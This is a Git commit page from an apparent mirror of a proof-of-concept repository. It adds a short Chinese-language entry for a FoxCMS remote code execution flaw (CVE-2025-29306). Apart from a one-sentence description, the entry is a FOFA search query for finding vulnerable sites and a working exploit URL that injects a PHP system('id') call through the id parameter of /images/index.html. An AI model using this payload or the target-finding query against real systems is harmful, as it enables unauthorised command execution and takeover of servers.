admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update and rename 1.md to FOXCMS黔狐内容管理系统_远程代码执行漏洞(CVE-2025-29306).md

Browse Source
This commit is contained in:
Rainyseason 2025-04-27 09:10:26 +08:00 committed by GitHub
parent 5de92c3176
commit ed4351332b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 12 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
wpoc/FOXCMS黔狐内容管理系统/1.md
View File

@ -1 +0,0 @@

12
wpoc/FOXCMS黔狐内容管理系统/FOXCMS黔狐内容管理系统_远程代码执行漏洞(CVE-2025-29306).md Normal file
View File

@ -0,0 +1,12 @@
# FOXCMS黔狐内容管理系统_远程代码执行漏洞(CVE-2025-29306)
# 漏洞简介
FoxCMS黔狐内容管理系统存在远程代码执行漏洞CVE-2025-29306。该漏洞存在于FoxCMS的index.html接口中允许攻击者通过特定的输入执行远程代码从而控制受影响的系统
# fofa
body="foxcms-logo" || body="foxcms-container"
# poc
```
http://host/images/index.html?id=%24{%40print(system(%22id%22))
```